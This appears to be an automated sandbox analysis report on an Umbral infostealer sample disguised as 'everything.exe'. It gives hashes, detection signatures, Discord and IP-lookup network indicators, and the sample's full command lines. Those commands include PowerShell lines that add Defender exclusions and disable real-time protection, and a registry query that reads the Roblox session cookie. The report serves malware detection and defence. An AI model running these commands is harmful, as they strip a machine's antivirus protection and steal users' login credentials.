Analysis
-
max time kernel
95s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
18/09/2024, 07:05
Behavioral task
behavioral1
Sample
everything.exe
Resource
win10v2004-20240802-en
General
-
Target
everything.exe
-
Size
231KB
-
MD5
c230d0ffbb5ba00f2bc8a3e51c831d30
-
SHA1
ba14e05c5b2f9bd82895598e4e037971cb88cb75
-
SHA256
cf7b9914e5b25efd7b449a9426d8d2cb570440da613b0bf7b258b425d2c6a7a0
-
SHA512
d4930c2f78d55037819d276e4321d43b759fb063834fd6b0e494730bad35f6815c2665106a3a976e8902b58b058a09ab3d6369c56dcc16aebfa487dbf66ef318
-
SSDEEP
6144:RloZMArIkd8g+EtXHkv/iD4av2h3tW+xdkt/qqfsCb8e1mKi:joZHL+EP8av2h3tW+xdkt/qqfPI
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/1500-1-0x000001AEDBB40000-0x000001AEDBB80000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3500 powershell.exe 1124 powershell.exe 2280 powershell.exe 2172 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts everything.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 24 discord.com 23 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 18 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4240 wmic.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 3500 powershell.exe 3500 powershell.exe 2172 powershell.exe 2172 powershell.exe 1124 powershell.exe 1124 powershell.exe 2976 powershell.exe 2976 powershell.exe 2280 powershell.exe 2280 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1500 everything.exe Token: SeDebugPrivilege 3500 powershell.exe Token: SeDebugPrivilege 2172 powershell.exe Token: SeDebugPrivilege 1124 powershell.exe Token: SeDebugPrivilege 2976 powershell.exe Token: SeIncreaseQuotaPrivilege 2488 wmic.exe Token: SeSecurityPrivilege 2488 wmic.exe Token: SeTakeOwnershipPrivilege 2488 wmic.exe Token: SeLoadDriverPrivilege 2488 wmic.exe Token: SeSystemProfilePrivilege 2488 wmic.exe Token: SeSystemtimePrivilege 2488 wmic.exe Token: SeProfSingleProcessPrivilege 2488 wmic.exe Token: SeIncBasePriorityPrivilege 2488 wmic.exe Token: SeCreatePagefilePrivilege 2488 wmic.exe Token: SeBackupPrivilege 2488 wmic.exe Token: SeRestorePrivilege 2488 wmic.exe Token: SeShutdownPrivilege 2488 wmic.exe Token: SeDebugPrivilege 2488 wmic.exe Token: SeSystemEnvironmentPrivilege 2488 wmic.exe Token: SeRemoteShutdownPrivilege 2488 wmic.exe Token: SeUndockPrivilege 2488 wmic.exe Token: SeManageVolumePrivilege 2488 wmic.exe Token: 33 2488 wmic.exe Token: 34 2488 wmic.exe Token: 35 2488 wmic.exe Token: 36 2488 wmic.exe Token: SeIncreaseQuotaPrivilege 2488 wmic.exe Token: SeSecurityPrivilege 2488 wmic.exe Token: SeTakeOwnershipPrivilege 2488 wmic.exe Token: SeLoadDriverPrivilege 2488 wmic.exe Token: SeSystemProfilePrivilege 2488 wmic.exe Token: SeSystemtimePrivilege 2488 wmic.exe Token: SeProfSingleProcessPrivilege 2488 wmic.exe Token: SeIncBasePriorityPrivilege 2488 wmic.exe Token: SeCreatePagefilePrivilege 2488 wmic.exe Token: SeBackupPrivilege 2488 wmic.exe Token: SeRestorePrivilege 2488 wmic.exe Token: SeShutdownPrivilege 2488 wmic.exe Token: SeDebugPrivilege 2488 wmic.exe Token: SeSystemEnvironmentPrivilege 2488 wmic.exe Token: SeRemoteShutdownPrivilege 2488 wmic.exe Token: SeUndockPrivilege 2488 wmic.exe Token: SeManageVolumePrivilege 2488 wmic.exe Token: 33 2488 wmic.exe Token: 34 2488 wmic.exe Token: 35 2488 wmic.exe Token: 36 2488 wmic.exe Token: SeIncreaseQuotaPrivilege 3480 wmic.exe Token: SeSecurityPrivilege 3480 wmic.exe Token: SeTakeOwnershipPrivilege 3480 wmic.exe Token: SeLoadDriverPrivilege 3480 wmic.exe Token: SeSystemProfilePrivilege 3480 wmic.exe Token: SeSystemtimePrivilege 3480 wmic.exe Token: SeProfSingleProcessPrivilege 3480 wmic.exe Token: SeIncBasePriorityPrivilege 3480 wmic.exe Token: SeCreatePagefilePrivilege 3480 wmic.exe Token: SeBackupPrivilege 3480 wmic.exe Token: SeRestorePrivilege 3480 wmic.exe Token: SeShutdownPrivilege 3480 wmic.exe Token: SeDebugPrivilege 3480 wmic.exe Token: SeSystemEnvironmentPrivilege 3480 wmic.exe Token: SeRemoteShutdownPrivilege 3480 wmic.exe Token: SeUndockPrivilege 3480 wmic.exe Token: SeManageVolumePrivilege 3480 wmic.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1500 wrote to memory of 3500 1500 everything.exe 82 PID 1500 wrote to memory of 3500 1500 everything.exe 82 PID 1500 wrote to memory of 2172 1500 everything.exe 84 PID 1500 wrote to memory of 2172 1500 everything.exe 84 PID 1500 wrote to memory of 1124 1500 everything.exe 86 PID 1500 wrote to memory of 1124 1500 everything.exe 86 PID 1500 wrote to memory of 2976 1500 everything.exe 88 PID 1500 wrote to memory of 2976 1500 everything.exe 88 PID 1500 wrote to memory of 2488 1500 everything.exe 92 PID 1500 wrote to memory of 2488 1500 everything.exe 92 PID 1500 wrote to memory of 3480 1500 everything.exe 95 PID 1500 wrote to memory of 3480 1500 everything.exe 95 PID 1500 wrote to memory of 4304 1500 everything.exe 97 PID 1500 wrote to memory of 4304 1500 everything.exe 97 PID 1500 wrote to memory of 2280 1500 everything.exe 99 PID 1500 wrote to memory of 2280 1500 everything.exe 99 PID 1500 wrote to memory of 4240 1500 everything.exe 101 PID 1500 wrote to memory of 4240 1500 everything.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\everything.exe"C:\Users\Admin\AppData\Local\Temp\everything.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\everything.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2172
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1124
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2976
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2488
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3480
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:4304
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2280
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:4240
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD571fa55c67a762ba70e40011153e19b3c
SHA1a36d2bb4802a8ec7db1a68de5f0c3d6007987492
SHA256b8be6896ca89d3ebe9ee8a94e3407483f4750badaf7fa33526817cfc926dc291
SHA51232760af7c05e20fec8cbddf56c2df544a69335f930f1d313cd1fdceaa90ed2afe81e54ac1b6770097d6f5ca5f30955f95970171a453579aa19239a17aaefe47f
-
Filesize
944B
MD5432507558b904755313d5b27a3dc271a
SHA1c5f1e5c3a723f83080c38f987b289e6b08eafd70
SHA256d037ed26ad6876ecaa84eaddff658fc90fa5c2e3a83822f140e11c30b6f61a07
SHA5127ee8989467bd7216417600ac44244fea7249061a515396ae5860cad37b1e0167a28387b02d6e2e1dbd140e9e51fee98c6f36aa0ad559137204923374de1f5d1f
-
Filesize
948B
MD517d8127be94d3c1b6fcc9a4ed585003e
SHA1789874fcc7c778c723f3e89822d8cc8750c6c4c8
SHA256ea357ad1f95863b3618d31e5b0f90495331f64de2b784d9e185b48668c937a7b
SHA512bb18b6d07d82227f5cfbe3eb460df79ec892c560ad2964dcd4782aa26336ae15059843bf46a739bdd4a4daa58057f99102531a756a1cf434ce6449b3cd35a98e
-
Filesize
1KB
MD5548dd08570d121a65e82abb7171cae1c
SHA11a1b5084b3a78f3acd0d811cc79dbcac121217ab
SHA256cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc
SHA51237b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b
-
Filesize
1KB
MD5208ef39582a181fb8c043a14d824206d
SHA1d0fabc499994dc11b403fef0ca1e66d831ea478e
SHA256b66b9feb94f0bf97089404fd46920776ef78a80103f65ef08eb7c847d696c210
SHA5125ed74b727aa712c1b9501a7ec734c82ba20d30e6c127f531b8fde9051f25882fde187ca90cfe2bb9ceb4347d41d64d76a1b098a995293fe5ca7aaa0312044ae5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82